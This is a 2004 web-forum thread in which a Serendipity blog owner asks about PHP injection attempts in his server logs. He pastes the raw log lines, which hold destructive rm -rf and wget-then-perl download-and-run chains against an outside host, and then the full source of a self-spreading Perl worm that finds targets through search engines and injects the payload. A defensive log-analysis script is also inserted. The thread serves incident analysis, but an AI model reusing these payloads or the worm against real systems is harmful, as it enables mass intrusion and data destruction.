Atom Hack Attempt?

Random stuff about serendipity. Discussion, Questions, Paraphernalia.
boone
Regular
Posts: 16
Joined: Sat Jan 17, 2004 3:09 am

Atom Hack Attempt?

Post by boone »

I saw this in my web logfile today. Any idea what hole they're trying to exploit and if I'm vulnerable? I'm running S9Y 0.7.1 and PHP 4.3.10 on Linux.

209.126.164.246 - - [26/Dec/2004:18:20:53 -0500] "GET /mike/rss.php?version=atom0.3&rush=echo%20_START_%3B%20cd%20/tmp;rm%20-rf%20*;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;
rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;
rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;
rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;
rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;
rm%20-rf%20*%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527 HTTP/1.0" 200 39900 "-" "LWP::Simple/5.43"
Last edited by boone on Mon Dec 27, 2004 3:50 am, edited 1 time in total.

Post by boone »

Hmm...a similar hit on rss.php:

67.18.198.10 - - [26/Dec/2004:18:39:33 -0500] "GET /mike/rss.php?version=1.0&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;rm%20-rf%20*;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;
rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;
rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;
rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;
rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;
rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F
&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 39081 "-" "LWP::Simple/5.65"
Last edited by boone on Mon Dec 27, 2004 3:55 am, edited 1 time in total.
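A small log triage script, added here as an example and not part of the thread, that takes lines shaped like the two hits above, percent-decodes each query parameter until it stops changing (so the %2527 that only turns into a quote on the second pass is caught, and the hex-encoded second variant reads the same as the first) and flags PHP command-execution calls and shell command chains; the IPs, download host and file names in its sample lines are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-log lines modelled on the two hits in the thread;
# the IPs, the download host and the file names are placeholders.
SAMPLE_LOG = [
    '10.0.0.1 - - [26/Dec/2004:18:20:53 -0500] "GET /mike/rss.php?version=atom0.3'
    '&rush=echo%20_START_%3B%20cd%20/tmp;rm%20-rf%20*;wget%20dl.example/x;perl%20x'
    '&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527 HTTP/1.0" 200 39900 "-" "LWP::Simple/5.43"',
    # Same injection with every letter of the PHP part hex-encoded, as in the second hit.
    '10.0.0.2 - - [26/Dec/2004:18:39:33 -0500] "GET /mike/rss.php?version=1.0&rush=%65%63%68%6F'
    '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53'
    '%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 39081 "-" "LWP::Simple/5.65"',
    # An ordinary feed fetch that must not be flagged.
    '10.0.0.3 - - [26/Dec/2004:19:00:00 -0500] "GET /mike/rss.php?version=atom0.3 HTTP/1.1" 200 39900 "-" "Mozilla/5.0"',
]
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) \S+" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
EXEC_FUNC_RE = re.compile(r"\b(?:passthru|system|exec|shell_exec|popen)\s*\(")
SHELL_RE = re.compile(r"(?:^|;)\s*(?:cd|rm|wget|curl|perl)\s")

def fully_decode(s, rounds=3):
    """Percent-decode until stable, so %2527 -> %27 -> ' shows up as a quote."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def analyze(line):
    """Return a finding for one log line, or None when nothing looks injected."""
    m = LOG_RE.match(line)
    if not m:
        return None
    _, _, query = m.group("target").partition("?")
    # Split on '&' by hand: the payload contains ';', which older parse_qs also splits on.
    params = {}
    for part in query.split("&"):
        key, _, value = part.partition("=")
        params[unquote(key)] = fully_decode(value)
    reasons = []
    for key, value in params.items():
        if EXEC_FUNC_RE.search(value):
            reasons.append(key + ": PHP command-execution call")
        if "'." in value or ".'" in value:
            reasons.append(key + ": quote/concat breakout visible after double decoding")
        if SHELL_RE.search(value):
            reasons.append(key + ": shell command chain")
    return {"ip": m.group("ip"), "status": m.group("status"), "ua": m.group("ua"), "reasons": reasons} if reasons else None
```

The 200 status and feed-sized byte counts in both hits say nothing about whether the injection ran, so a flagged request is a prompt to check the directories the payload writes to (/tmp, /var/tmp, the mail spools) rather than proof either way.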

Post by boone »

One of the PHP "sess" files referenced in that mess of a URL contained this:


#!/usr/bin/perl

use LWP::Simple;
use IO::Socket::INET;




my $processo = "/usr/bin/httpd -DSSL";
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"} = "IGNORE";
$SIG{"CHLD"} = "IGNORE";
$SIG{"PS"} = "IGNORE";

$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

while(1){
$numr = int rand(9999);
$caxe = ".";
$caxe1 = ".";
$caxe .= rand(9999);
$caxe1 .= rand(9999);
$arq = ".";
$arq = int rand(9999);

open(sites,">$arq");
print sites "";
close(sites);


$procura = 'inurl:*.php?*=' . $numr;

for($n=0;$n<900;$n += 10){
$sock = IO::Socket::INET->new(PeerAddr => "www.google.com", PeerPort => 80, Proto => "tcp") or next;
print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
@resu = <$sock>;
close($sock);
$ae = "@resu";
while ($ae=~ m/<a href=.*?>.*?<\/a>/){
  $ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;
  $uber=$1;
	if ($uber !~/translate/)
	{
	if ($uber !~ /cache/)
	{
	if ($uber !~ /"/)
	{
	if ($uber !~ /google/)
	{
	if ($uber !~ /216/)
	{
	if ($uber =~/http/)
	{
	if ($uber !~ /start=/)
	{
	  open(arq,">>$arq");
          print arq "$uber\n";
          close(arq);
}}}}}}}}}


for($cadenu=1;$cadenu <= 991; $cadenu +=10){

@cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu") or next;
$ae = "@cade";

while ($ae=~ m/<em class=yschurl>.*?<\/em>/){
  $ae=~ s/<em class=yschurl>(.*?)<\/em>/$1/;
  $uber=$1;
  
$uber =~ s/ //g;
$uber =~ s/<b>//g;
$uber =~ s/<\/b>//g;

open(a,">>$arq");
print a "$uber\n";
close(a);
}}

$ark = $arq; 
@si = "";
open (arquivo,"<$ark");
@si = <arquivo>;
close(arquivo);
$novo =""; 
foreach (@si){
if (!$si{$_})
{ 
$novo .= $_;
$si{$_} = 1;
}
}
open (arquivo,">$ark");
print arquivo $novo;
close(arquivo);


$a =0;
$b =0;
open(ae,"<$arq");
while(<ae>)
 {$sites[$a] = $_;
  chomp $sites[$a];
  $a++;
  $b++;}
close(ae);

for ($a=0;$a<=$b;$a++){
open (file, ">$caxe");
      print file "";
close(file);
open (file, ">$caxe1");
      print file "";
close(file);
$k=0;
$e=0;
 $data=get($sites[$a]) or next;
  while($data=~ m/<a href=".*?">.*?<\/a>/){
  $data=~ s/<a href="(.*?)">.*?<\/a>/$1/;
  $ubersite=$1;
  
  if ($ubersite =~/"/)
   {
   $nu = index $ubersite, '"';
   $ubersite = substr($ubersite,0,$nu);
   }
if ($ubersite !~/http/)
 {$ubersite = $sites[$a].'/'.$ubersite;} 
open(file,">>$caxe") || die("nao abriu caxe.txt $!");
print file "$ubersite\n"; 
close(file); 
}

$lista1 = 'http://envidiosos.org/~pillar/.zk/php.gif?&cmd=cd /tmp;rm -rf *;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl sess_189f0f0889555397a4de5485dd611113;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl sess_189f0f0889555397a4de5485dd611112;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl sess_189f0f0889555397a4de5485dd611114;rm -rf *;cd /var/tmp/;rm -rf *;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl sess_189f0f0889555397a4de5485dd611113;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl sess_189f0f0889555397a4de5485dd611112;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl sess_189f0f0889555397a4de5485dd611114;rm -rf *;cd /var/spool/mail/;rm -rf *;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl sess_189f0f0889555397a4de5485dd611113;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl sess_189f0f0889555397a4de5485dd611112;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl sess_189f0f0889555397a4de5485dd611114;rm -rf *;cd /var/mail/;rm -rf *;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl sess_189f0f0889555397a4de5485dd611113;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl sess_189f0f0889555397a4de5485dd611112;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl sess_189f0f0889555397a4de5485dd611114;rm -rf *;cd  
/usr/local/apache/proxy/;rm -rf *;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl sess_189f0f0889555397a4de5485dd611113;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl sess_189f0f0889555397a4de5485dd611112;wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl sess_189f0f0889555397a4de5485dd611114;rm -rf *';

$t =0;
$y =0;
@ja;
open(opa,"<$caxe") or die "nao deu pra abrir o arquivo caxe.txt";
while (<opa>)
{
 $ja[$t] = $_;
 chomp $ja[$t];
 $t++;
 $y++;
}
close(opa);
$t=1;
while ($t < $y)
   {
    if ($ja[$t] =~/=/)
      {
       $num = rindex $ja[$t], '=';
       $num += 1;
       $ja[$t] = substr($ja[$t],0,$num);    
            open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
            print jaera "$ja[$t]$lista1\n";
            close(jaera);
        $num = index $ja[$t], '=';
        $num += 1;
        $ja[$t] = substr($ja[$t],0,$num);       
        $num1 = rindex $ja[$t], '.';
        $subproc = substr($ja[$t],$num1,$num);
         
            open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
            print jaera "$ja[$t]$lista1\n";
            close(jaera);
      }
     $t++;
     }
$ark = "$caxe1"; 
@si = "";
open (arquivo,"<$ark");
@si = <arquivo>;
close(arquivo);
$novo =""; 
foreach (@si){
if (!$si{$_})
{ 
$novo .= $_;
$si{$_} = 1;
}
}
open (arquivo,">$ark");
print arquivo $novo;
close(arquivo);
	$q=0;
	$w=0;
	 @hot;
	open (ops,"<$caxe1");
	while(<ops>)
	{
	$hot[$q] = $_;
	chomp $hot[$q];
	$q++;
	$w++;
	}
	close(ops);

for($q=0;$q<=$w;$q++)
  {
 
  if ($hot[$q] =~/http/)
    {
	$tipo=get($hot[$q]) or next;
	}}


}
}

Post by boone »

The more I look at this stuff, the more it looks like a worm to exploit the recent PHP flaws. Hopefully I'm alright with S9Y 0.7.1 and PHP 4.3.10.
Little Hamster
Regular
Posts: 62
Joined: Thu Oct 07, 2004 3:16 pm

Post by Little Hamster »

If it's the PHP flaw, you'll be fine. Only versions before 4.3.10 are vulnerable.
nohn
Regular
Posts: 37
Joined: Fri Oct 08, 2004 3:28 pm

Post by nohn »

It's definitely not the phpBB bug. I don't know enough about the unserialize() PHP bug, but I agree: it's the most likely theory.